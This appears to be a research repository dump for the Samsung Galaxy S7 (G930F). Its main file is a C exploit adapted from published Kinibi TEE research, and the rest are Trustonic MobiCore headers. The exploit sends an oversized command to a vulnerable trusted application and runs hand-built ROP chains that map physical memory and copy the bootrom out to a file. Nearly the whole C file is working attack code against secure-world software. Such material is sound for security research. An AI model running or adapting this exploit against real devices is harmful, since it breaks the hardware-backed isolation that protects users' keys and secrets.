| -------------------------------------------------------------------------------- /g930f_dump-bootrom.c: -------------------------------------------------------------------------------- 1 | // forked from https://www.synacktiv.com/posts/exploit/kinibi-tee-trusted-application-exploitation.html 2 | // to https://github.com/frederic/exynos8890-bootrom-dump 3 | 4 | #include 5 | #include 6 | #include 7 | #include 8 | 9 | #include "MobiCoreDriverApi.h" 10 | 11 | #define err(f_, ...) {printf("[\033[31;1m!\033[0m] "); printf(f_, ##__VA_ARGS__);} 12 | #define ok(f_, ...) {printf("[\033[32;1m+\033[0m] "); printf(f_, ##__VA_ARGS__);} 13 | #define info(f_, ...) {printf("[\033[34;1m-\033[0m] "); printf(f_, ##__VA_ARGS__);} 14 | #define warn(f_, ...) {printf("[\033[33;1mw\033[0m] "); printf(f_, ##__VA_ARGS__);} 15 | 16 | void printArray(unsigned char buf[], unsigned int n) { 17 | int i; 18 | for (i = 0; i < n; i++) 19 | { 20 | printf("%02X", buf[i]); 21 | } 22 | printf("\n"); 23 | } 24 | 25 | int main(int argc, char **argv) { 26 | mcResult_t ret; 27 | mcSessionHandle_t session = {0}; 28 | mcBulkMap_t map; 29 | uint32_t stack_size; 30 | char *to_map; 31 | 32 | if(argc != 2) { 33 | printf("Usage: %s \n", argv[0]); 34 | exit(1); 35 | } 36 | 37 | uint32_t offset = strtoul(argv[1], NULL, 16); 38 | 39 | // ROPgadget --binary fffffffff0000000000000000000001b.tlbin \ 40 | // --rawArch arm --rawMode thumb --offset 0x1000 41 | uint32_t rop_chain[0x300] = { 42 | 0x39dc + 1, // pop {r0, r1, r2, r3, r4, r5, r6, pc} 43 | 0x8, // r0 tlApi_callDriver=0x8 44 | 0x40002, // r1 driverId 45 | 0xdf0f8, // r2 params address on the stack 46 | 0x0, // r3 (not used) 47 | 0x0, // r4 (not used) 48 | 0x0, // r5 (not used) 49 | 0x0, // r6 (not used) 50 | 0x07d01008, // tlApiLibEntry 51 | //@0xdf0f8: 52 | 0xf,//handler ID 53 | 0x0,//SPID 54 | 0xdf104,//params on the stack 55 | //@0xdf104: 56 | 0x0, 57 | 0x0, 58 | 0x0, 59 | }; 60 | 61 | FILE *f = fopen( 62 | "/data/local/tmp/G930FXXU1DQAN_fffffffff0000000000000000000001b.tlbin",//sha1: 3f2a62d5ba8113be2dd1287234ae04a3188733ea 63 | "rb" 64 | ); 65 | if(!f) { 66 | err("Can't open TA %s\n",argv[1]); 67 | return 1; 68 | } 69 | fseek(f, 0, SEEK_END); 70 | uint32_t ta_size = ftell(f); 71 | fseek(f, 0, SEEK_SET); 72 | 73 | 74 | char *ta_mem = malloc(ta_size); 75 | if (fread(ta_mem, ta_size, 1, f) != 1) { 76 | err("Can't read TA"); 77 | return 1; 78 | } 79 | 80 | uint32_t tciLen = 0x20000; // TA access to fixed offset on this WSM 81 | // so the buffer should be large enough 82 | uint32_t *tci = malloc(tciLen); 83 | 84 | ret = mcOpenDevice(MC_DEVICE_ID_DEFAULT); 85 | if(ret != MC_DRV_OK) { 86 | err("Can't mcOpenDevice\n"); 87 | return 1; 88 | } 89 | 90 | to_map = malloc(0x1000); 91 | 92 | ret = mcOpenTrustlet(&session, 0, ta_mem, ta_size, 93 | (uint8_t *)tci, tciLen); 94 | if(ret == MC_DRV_OK) { 95 | // map the string in TA virtual space, the API returns 96 | // the address in the TA space. 97 | ret = mcMap(&session, to_map, 40960, (mcBulkMap_t *)&map); 98 | if (ret != MC_DRV_OK) { 99 | err("Can't map in\n"); 100 | return 1; 101 | } 102 | ok("Address in TA virtual memory : 0x%x (0x%x bytes)\n", map.sVirtualAddr, map.sVirtualLen); 103 | 104 | uint32_t rop_chain_dr[] = { 105 | 0x18f22+1, // pc => @gadget0: pop.w { r1, r2, r3, r4, r5, r6, r7, r8, r9, r10, r11, pc } 106 | 0x0, // r1 (overwritten) 107 | 0x0 + offset,// r2 => @startPhys0 108 | 0x0, // r3 => @startPhys1 109 | 0x0, // r4 (overwritten) 110 | 0x0, // r5 111 | 0x0, // r6 (overwritten) 112 | 0x0, // r7 113 | 0x0, // r8 114 | 0x0, // r9 115 | 0x0, // r10 116 | 0x0, // r11 117 | 0x123a0+1, // pc => @gadget1: pop { r0, r1, r4, r6, pc } 118 | 0x80000 + offset, // r0 => @@startVirt 119 | 0x0, // r1 / param_2 (overwritten with 0x1000) => mapSize 120 | 0x0, // r4 121 | 0x0, // r6 122 | 0x1254c + 1, // pc => @gadget2: MapPhys64 + 2 (skip push) 123 | // 00012558 08 bd pop { r3, pc } 124 | 0x0, // (overwritten) => param_2 125 | 0x1bbd0 + 1, // pop { r1, r2, r6, pc } 126 | 0x9, // param_2 => attr, r1 127 | 0x123a0 + 1,// r2, pc => @gadget4: pop { r0, r1, r4, r6, pc } 128 | 0x0, // r6 129 | 0x19ecc + 1, // pc => pop.w { r4, r5, r6, lr } ; mov r0,#0x0 ; bx r2 130 | 0x0, // r4 131 | 0x0, // r5 132 | 0x0, // r6 133 | 0x18f22 + 1, // lr => pop.w { r1, r2, r3, r4, r5, r6, r7, r8, r9, r10, r11, pc } 134 | map.sVirtualAddr, // r0 : TA virt addr 135 | 0x0, // r1 136 | 0x0, // r4 137 | 0x0, // r6 138 | 0x12490 + 1, // pc => drApiAddrTranslateAndCheck 139 | 0x80000 + offset,// r1 140 | 0x1000,// r2 =>memcpy size 141 | 0x0,// r3 142 | 0x0,// r4 143 | 0x0,// r5 144 | 0x0, // r6 145 | 0x0, // r7 146 | 0x0, // r8 147 | 0x0, // r9 148 | 0x0, // r10 149 | 0x0, // r11 150 | 0xdc38 + 1, // pc => memcpy (thumb=0) // END 151 | 0x0, 152 | 0xc682 + 1, //pc => Back to DriverHandler to exit without crash 153 | 0xc1c0, //r0 : "VALIDATOR [WARN ]: SPID - 0x%08X 0x%08X" 154 | }; 155 | 156 | rop_chain[0x8c] = 0x13c + sizeof(rop_chain_dr);//memcpy size 157 | 158 | memcpy(&rop_chain[0x9b], rop_chain_dr, sizeof(rop_chain_dr)); 159 | 160 | stack_size = 0xD0; // fill stack frame 161 | stack_size += 0x20; // popped registers size 162 | 163 | // fill tciBuffer 164 | tci[0] = 27; // cmd id in TA for vulnerable handler 165 | tci[3] = stack_size + sizeof(rop_chain); // memcpy size 166 | memcpy(&tci[4 + stack_size/4], &rop_chain, sizeof(rop_chain)); 167 | 168 | // notify the TA 169 | mcNotify(&session); 170 | mcWaitNotification(&session, 2000); 171 | mcCloseSession(&session); 172 | } 173 | mcCloseDevice(MC_DEVICE_ID_DEFAULT); 174 | 175 | char fdout_name[32]; 176 | snprintf(fdout_name, sizeof(fdout_name), "dump_0x%x.bin", offset); 177 | FILE* fdout = fopen(fdout_name, "wb"); 178 | printf("Dumped to file %s\n", fdout_name); 179 | fwrite(to_map, 1, 0x1000, fdout); 180 | fclose(fdout); 181 | printArray(to_map, 0x1000); 182 | return 0; 183 | } 184 | -------------------------------------------------------------------------------- /mcSpid.h: -------------------------------------------------------------------------------- 1 | /* 2 | * Copyright (c) 2013-2015 TRUSTONIC LIMITED 3 | * All rights reserved. 4 | * 5 | * Redistribution and use in source and binary forms, with or without 6 | * modification, are permitted provided that the following conditions are met: 7 | * 8 | * 1. Redistributions of source code must retain the above copyright notice, 9 | * this list of conditions and the following disclaimer. 10 | * 11 | * 2. Redistributions in binary form must reproduce the above copyright 12 | * notice, this list of conditions and the following disclaimer in the 13 | * documentation and/or other materials provided with the distribution. 14 | * 15 | * 3. Neither the name of the TRUSTONIC LIMITED nor the names of its 16 | * contributors may be used to endorse or promote products derived from 17 | * this software without specific prior written permission. 18 | * 19 | * THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS 20 | * "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED 21 | * TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR 22 | * PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR 23 | * CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, 24 | * EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, 25 | * PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; 26 | * OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, 27 | * WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR 28 | * OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF 29 | * ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. 30 | */ 31 | 32 | #ifndef MC_SPID_H_ 33 | #define MC_SPID_H_ 34 | 35 | #ifdef WIN32 36 | #define _UNUSED 37 | #else 38 | #define _UNUSED __attribute__((unused)) 39 | #endif 40 | 41 | /** Service provider Identifier type. */ 42 | typedef uint32_t mcSpid_t; 43 | 44 | /** SPID value used as free marker in root containers. */ 45 | static _UNUSED const mcSpid_t MC_SPID_FREE = 0xFFFFFFFF; 46 | 47 | /** Reserved SPID value. */ 48 | static _UNUSED const mcSpid_t MC_SPID_RESERVED = 0; 49 | 50 | /** SPID for system applications. */ 51 | static _UNUSED const mcSpid_t MC_SPID_SYSTEM = 0xFFFFFFFE; 52 | 53 | /** SPID reserved for tests only */ 54 | static _UNUSED const mcSpid_t MC_SPID_RESERVED_TEST = 0xFFFFFFFD; 55 | static _UNUSED const mcSpid_t MC_SPID_TRUSTONIC_TEST = 0x4; 56 | 57 | /** SPID reserved for OTA development */ 58 | static _UNUSED const mcSpid_t MC_SPID_TRUSTONIC_OTA = 0x2A; 59 | 60 | /** GP TAs - stored in the trusted storage. They all share the same */ 61 | static _UNUSED const mcSpid_t MC_SPID_GP = 0xFFFFFFFC; 62 | 63 | /** RTM's SPID */ 64 | static _UNUSED const mcSpid_t MC_SPID_RTM = 0xFFFFFFFB; 65 | 66 | #endif // MC_SPID_H_ 67 | 68 | -------------------------------------------------------------------------------- /mcUuid.h: -------------------------------------------------------------------------------- 1 | /* 2 | * Copyright (c) 2013-2015 TRUSTONIC LIMITED 3 | * All rights reserved. 4 | * 5 | * Redistribution and use in source and binary forms, with or without 6 | * modification, are permitted provided that the following conditions are met: 7 | * 8 | * 1. Redistributions of source code must retain the above copyright notice, 9 | * this list of conditions and the following disclaimer. 10 | * 11 | * 2. Redistributions in binary form must reproduce the above copyright 12 | * notice, this list of conditions and the following disclaimer in the 13 | * documentation and/or other materials provided with the distribution. 14 | * 15 | * 3. Neither the name of the TRUSTONIC LIMITED nor the names of its 16 | * contributors may be used to endorse or promote products derived from 17 | * this software without specific prior written permission. 18 | * 19 | * THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS 20 | * "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED 21 | * TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR 22 | * PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR 23 | * CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, 24 | * EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, 25 | * PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; 26 | * OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, 27 | * WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR 28 | * OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF 29 | * ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. 30 | */ 31 | 32 | #ifndef MC_UUID_H_ 33 | #define MC_UUID_H_ 34 | 35 | #ifdef WIN32 36 | #define _UNUSED 37 | #else 38 | #define _UNUSED __attribute__((unused)) 39 | #endif 40 | 41 | #define UUID_TYPE 42 | 43 | #define UUID_LENGTH 16 44 | /** Universally Unique Identifier (UUID) according to ISO/IEC 11578. */ 45 | typedef struct { 46 | uint8_t value[UUID_LENGTH]; /**< Value of the UUID. */ 47 | } mcUuid_t, *mcUuid_ptr; 48 | 49 | /** UUID value used as free marker in service provider containers. */ 50 | #define MC_UUID_FREE_DEFINE \ 51 | { 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, \ 52 | 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF } 53 | 54 | static _UNUSED const mcUuid_t MC_UUID_FREE = { 55 | MC_UUID_FREE_DEFINE 56 | }; 57 | 58 | /** Reserved UUID. */ 59 | #define MC_UUID_RESERVED_DEFINE \ 60 | { 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, \ 61 | 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00 } 62 | 63 | static _UNUSED const mcUuid_t MC_UUID_RESERVED = { 64 | MC_UUID_RESERVED_DEFINE 65 | }; 66 | 67 | /** UUID for system applications. */ 68 | #define MC_UUID_SYSTEM_DEFINE \ 69 | { 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, \ 70 | 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFE } 71 | 72 | static _UNUSED const mcUuid_t MC_UUID_SYSTEM = { 73 | MC_UUID_SYSTEM_DEFINE 74 | }; 75 | 76 | #define MC_UUID_RTM_DEFINE \ 77 | { 0x12, 0x34, 0x12, 0x34, 0x12, 0x34, 0x12, 0x34, \ 78 | 0x12, 0x34, 0x12, 0x34, 0x12, 0x34, 0x12, 0x34 } 79 | 80 | static _UNUSED const mcUuid_t MC_UUID_RTM = { 81 | MC_UUID_RTM_DEFINE 82 | }; 83 | 84 | /** 85 | * TODO: Replace with v5 UUID (milestone #3) 86 | */ 87 | #define LTA_UUID_DEFINE \ 88 | { 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, \ 89 | 0x11, 0x11, 0x11, 0x11, 0x11, 0x11, 0x11, 0x11} 90 | 91 | #endif // MC_UUID_H_ 92 | 93 | -------------------------------------------------------------------------------- /mcVersionInfo.h: -------------------------------------------------------------------------------- 1 | /* 2 | * Copyright (c) 2013-2015 TRUSTONIC LIMITED 3 | * All rights reserved. 4 | * 5 | * Redistribution and use in source and binary forms, with or without 6 | * modification, are permitted provided that the following conditions are met: 7 | * 8 | * 1. Redistributions of source code must retain the above copyright notice, 9 | * this list of conditions and the following disclaimer. 10 | * 11 | * 2. Redistributions in binary form must reproduce the above copyright 12 | * notice, this list of conditions and the following disclaimer in the 13 | * documentation and/or other materials provided with the distribution. 14 | * 15 | * 3. Neither the name of the TRUSTONIC LIMITED nor the names of its 16 | * contributors may be used to endorse or promote products derived from 17 | * this software without specific prior written permission. 18 | * 19 | * THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS 20 | * "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED 21 | * TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR 22 | * PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR 23 | * CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, 24 | * EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, 25 | * PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; 26 | * OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, 27 | * WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR 28 | * OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF 29 | * ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. 30 | */ 31 | #ifndef MCVERSIONINFO_H_ 32 | #define MCVERSIONINFO_H_ 33 | 34 | /** Length of MobiCore product ID string. */ 35 | #define MC_PRODUCT_ID_LEN 64 36 | 37 | /** Global MobiCore Version Information. 38 | */ 39 | typedef struct { 40 | char productId[MC_PRODUCT_ID_LEN]; /** < Product ID of Mobicore; zero-terminated */ 41 | uint32_t versionMci; /** < Version of Mobicore Control Interface */ 42 | uint32_t versionSo; /** < Version of Secure Objects */ 43 | uint32_t versionMclf; /** < Version of MobiCore Load Format */ 44 | uint32_t versionContainer; /** < Version of MobiCore Container Format */ 45 | uint32_t versionMcConfig; /** < Version of MobiCore Configuration Block Format */ 46 | uint32_t versionTlApi; /** < Version of MobiCore Trustlet API Implementation */ 47 | uint32_t versionDrApi; /** < Version of MobiCore Driver API Implementation */ 48 | uint32_t versionCmp; /** < Version of Content Management Protocol */ 49 | } mcVersionInfo_t; 50 | 51 | #endif /** MCVERSIONINFO_H_ */ 52 | --------------------------------------------------------------------------------